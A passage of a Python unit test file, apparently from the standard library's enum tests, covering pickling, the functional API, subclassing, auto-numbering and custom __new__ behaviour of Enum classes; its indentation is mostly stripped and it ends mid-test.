self.assertIs(IntStooges.from_bytes(b'\x00\x03', 'big'), IntStooges.MOE)
with self.assertRaises(ValueError):
IntStooges.from_bytes(b'\x00\x05', 'big')
def test_floatenum_fromhex(self):
h = float.hex(FloatStooges.MOE.value)
self.assertIs(FloatStooges.fromhex(h), FloatStooges.MOE)
h = float.hex(FloatStooges.MOE.value + 0.01)
with self.assertRaises(ValueError):
FloatStooges.fromhex(h)
def test_pickle_enum(self):
if isinstance(Stooges, Exception):
raise Stooges
test_pickle_dump_load(self.assertIs, Stooges.CURLY)
test_pickle_dump_load(self.assertIs, Stooges)
def test_pickle_int(self):
if isinstance(IntStooges, Exception):
raise IntStooges
test_pickle_dump_load(self.assertIs, IntStooges.CURLY)
test_pickle_dump_load(self.assertIs, IntStooges)
def test_pickle_float(self):
if isinstance(FloatStooges, Exception):
raise FloatStooges
test_pickle_dump_load(self.assertIs, FloatStooges.CURLY)
test_pickle_dump_load(self.assertIs, FloatStooges)
def test_pickle_enum_function(self):
if isinstance(Answer, Exception):
raise Answer
test_pickle_dump_load(self.assertIs, Answer.him)
test_pickle_dump_load(self.assertIs, Answer)
def test_pickle_enum_function_with_module(self):
if isinstance(Question, Exception):
raise Question
test_pickle_dump_load(self.assertIs, Question.who)
test_pickle_dump_load(self.assertIs, Question)
def test_enum_function_with_qualname(self):
if isinstance(Theory, Exception):
raise Theory
self.assertEqual(Theory.__qualname__, 'spanish_inquisition')
def test_class_nested_enum_and_pickle_protocol_four(self):
# would normally just have this directly in the class namespace
class NestedEnum(Enum):
twigs = 'common'
shiny = 'rare'
self.__class__.NestedEnum = NestedEnum
self.NestedEnum.__qualname__ = '%s.NestedEnum' % self.__class__.__name__
test_pickle_dump_load(self.assertIs, self.NestedEnum.twigs)
def test_pickle_by_name(self):
class ReplaceGlobalInt(IntEnum):
ONE = 1
TWO = 2
ReplaceGlobalInt.__reduce_ex__ = enum._reduce_ex_by_name
for proto in range(HIGHEST_PROTOCOL):
self.assertEqual(ReplaceGlobalInt.TWO.__reduce_ex__(proto), 'TWO')
def test_exploding_pickle(self):
BadPickle = Enum(
'BadPickle', 'dill sweet bread-n-butter', module=__name__)
globals()['BadPickle'] = BadPickle
# now break BadPickle to test exception raising
enum._make_class_unpicklable(BadPickle)
test_pickle_exception(self.assertRaises, TypeError, BadPickle.dill)
test_pickle_exception(self.assertRaises, PicklingError, BadPickle)
def test_string_enum(self):
class SkillLevel(str, Enum):
master = 'what is the sound of one hand clapping?'
journeyman = 'why did the chicken cross the road?'
apprentice = 'knock, knock!'
self.assertEqual(SkillLevel.apprentice, 'knock, knock!')
def test_getattr_getitem(self):
class Period(Enum):
morning = 1
noon = 2
evening = 3
night = 4
self.assertIs(Period(2), Period.noon)
self.assertIs(getattr(Period, 'night'), Period.night)
self.assertIs(Period['morning'], Period.morning)
def test_getattr_dunder(self):
Season = self.Season
self.assertTrue(getattr(Season, '__eq__'))
def test_iteration_order(self):
class Season(Enum):
SUMMER = 2
WINTER = 4
AUTUMN = 3
SPRING = 1
self.assertEqual(
list(Season),
[Season.SUMMER, Season.WINTER, Season.AUTUMN, Season.SPRING],
)
def test_reversed_iteration_order(self):
self.assertEqual(
list(reversed(self.Season)),
[self.Season.WINTER, self.Season.AUTUMN, self.Season.SUMMER,
self.Season.SPRING]
)
def test_programmatic_function_string(self):
SummerMonth = Enum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', start=10)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 10):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'])
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_string_list_with_start(self):
SummerMonth = Enum('SummerMonth', ['june', 'july', 'august'], start=20)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 20):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_iterable(self):
SummerMonth = Enum(
'SummerMonth',
(('june', 1), ('july', 2), ('august', 3))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_from_dict(self):
SummerMonth = Enum(
'SummerMonth',
OrderedDict((('june', 1), ('july', 2), ('august', 3)))
)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(int(e.value), i)
self.assertNotEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_with_start(self):
SummerMonth = Enum('SummerMonth', 'june july august', type=int, start=30)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 30):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass(self):
SummerMonth = IntEnum('SummerMonth', 'june july august')
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 1):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
def test_programmatic_function_type_from_subclass_with_start(self):
SummerMonth = IntEnum('SummerMonth', 'june july august', start=40)
lst = list(SummerMonth)
self.assertEqual(len(lst), len(SummerMonth))
self.assertEqual(len(SummerMonth), 3, SummerMonth)
self.assertEqual(
[SummerMonth.june, SummerMonth.july, SummerMonth.august],
lst,
)
for i, month in enumerate('june july august'.split(), 40):
e = SummerMonth(i)
self.assertEqual(e, i)
self.assertEqual(e.name, month)
self.assertIn(e, SummerMonth)
self.assertIs(type(e), SummerMonth)
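    # The tests above cover the functional API's value specs, which are
    # all equivalent ways of building the same members:
    #   Enum('SummerMonth', 'june july august')
    #   Enum('SummerMonth', ['june', 'july', 'august'])
    #   Enum('SummerMonth', (('june', 1), ('july', 2), ('august', 3)))
    #   Enum('SummerMonth', OrderedDict((('june', 1), ('july', 2), ('august', 3))))
    # plus the optional start=, type=, module= and qualname= keywords.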
def test_subclassing(self):
if isinstance(Name, Exception):
raise Name
self.assertEqual(Name.BDFL, 'Guido van Rossum')
        self.assertIs(Name.BDFL, Name('Guido van Rossum'))
self.assertIs(Name.BDFL, getattr(Name, 'BDFL'))
test_pickle_dump_load(self.assertIs, Name.BDFL)
def test_extending(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
with self.assertRaisesRegex(TypeError, "EvenMoreColor: cannot extend enumeration 'Color'"):
class EvenMoreColor(Color, IntEnum):
chartruese = 7
def test_exclude_methods(self):
class whatever(Enum):
this = 'that'
these = 'those'
def really(self):
return 'no, not %s' % self.value
self.assertIsNot(type(whatever.really), whatever)
self.assertEqual(whatever.this.really(), 'no, not that')
def test_wrong_inheritance_order(self):
with self.assertRaises(TypeError):
class Wrong(Enum, str):
NotHere = 'error before this point'
def test_intenum_transitivity(self):
class number(IntEnum):
one = 1
two = 2
three = 3
class numero(IntEnum):
uno = 1
dos = 2
tres = 3
self.assertEqual(number.one, numero.uno)
self.assertEqual(number.two, numero.dos)
self.assertEqual(number.three, numero.tres)
def test_wrong_enum_in_call(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_wrong_enum_in_mixed_call(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(Enum):
male = 0
female = 1
self.assertRaises(ValueError, Monochrome, Gender.male)
def test_mixed_enum_in_call_1(self):
class Monochrome(IntEnum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.female), Monochrome.white)
def test_mixed_enum_in_call_2(self):
class Monochrome(Enum):
black = 0
white = 1
class Gender(IntEnum):
male = 0
female = 1
self.assertIs(Monochrome(Gender.male), Monochrome.black)
def test_flufl_enum(self):
class Fluflnum(Enum):
def __int__(self):
return int(self.value)
class MailManOptions(Fluflnum):
option1 = 1
option2 = 2
option3 = 3
self.assertEqual(int(MailManOptions.option1), 1)
def test_introspection(self):
class Number(IntEnum):
one = 100
two = 200
self.assertIs(Number.one._member_type_, int)
self.assertIs(Number._member_type_, int)
class String(str, Enum):
yarn = 'soft'
rope = 'rough'
wire = 'hard'
self.assertIs(String.yarn._member_type_, str)
self.assertIs(String._member_type_, str)
class Plain(Enum):
vanilla = 'white'
one = 1
self.assertIs(Plain.vanilla._member_type_, object)
self.assertIs(Plain._member_type_, object)
def test_no_such_enum_member(self):
class Color(Enum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
Color(4)
with self.assertRaises(KeyError):
Color['chartreuse']
def test_new_repr(self):
class Color(Enum):
red = 1
green = 2
blue = 3
def __repr__(self):
return "don't you just love shades of %s?" % self.name
self.assertEqual(
repr(Color.blue),
"don't you just love shades of blue?",
)
def test_inherited_repr(self):
class MyEnum(Enum):
def __repr__(self):
return "My name is %s." % self.name
class MyIntEnum(int, MyEnum):
this = 1
that = 2
theother = 3
self.assertEqual(repr(MyIntEnum.that), "My name is that.")
def test_multiple_mixin_mro(self):
class auto_enum(type(Enum)):
def __new__(metacls, cls, bases, classdict):
temp = type(classdict)()
temp._cls_name = cls
names = set(classdict._member_names)
i = 0
for k in classdict._member_names:
v = classdict[k]
if v is Ellipsis:
v = i
else:
i = v
i += 1
temp[k] = v
for k, v in classdict.items():
if k not in names:
temp[k] = v
return super(auto_enum, metacls).__new__(
metacls, cls, bases, temp)
class AutoNumberedEnum(Enum, metaclass=auto_enum):
pass
class AutoIntEnum(IntEnum, metaclass=auto_enum):
pass
class TestAutoNumber(AutoNumberedEnum):
a = ...
b = 3
c = ...
class TestAutoInt(AutoIntEnum):
a = ...
b = 3
c = ...
def test_subclasses_with_getnewargs(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs__(self):
return self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_getnewargs_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __getnewargs_ex__(self):
return self._args, {}
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce__(self):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_with_reduce_ex(self):
class NamedInt(int):
__qualname__ = 'NamedInt' # needed for pickle protocol 4
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(
type(self).__name__,
self.__name__,
int.__repr__(self),
)
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp,
)
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
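    # Pattern shared by the three tests above: a custom __new__ that sets
    # _value_ lets an Enum compute its own values, so members declared
    # with empty tuples still come out numbered 1..n.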
def test_equality(self):
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(ALWAYS_EQ, OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, ALWAYS_EQ)
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
class Base2(Enum):
@enum.property
def flash(self):
return 'flashy dynamic'
class Test(Base2):
flash = 1
self.assertEqual(Test.flash.flash, 'flashy dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
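    # Spot check of the surface_gravity computation above for EARTH:
    #   6.67300e-11 * 5.976e24 / (6.37814e6 ** 2) ~= 9.80 m/s**2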
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
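    # _ignore_ ('Period i' above) removes those names from the class body
    # before members are created, which is what lets the loops build
    # 13 + 53 + 32 timedelta members without turning the loop variable
    # or the vars() alias into members themselves.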
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
        # renamed the loop variable so it no longer shadows the enum module
        for member, value in zip(ColorInAList, range(3)):
            value += 1
            self.assertEqual(member.value, [value])
            self.assertIs(ColorInAList([value]), member)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_order(self):
with self.assertRaises(TypeError):
class Color(Enum):
red = auto()
green = auto()
blue = auto()
def _generate_next_value_(name, start, count, last):
return name
def test_auto_order_weird(self):
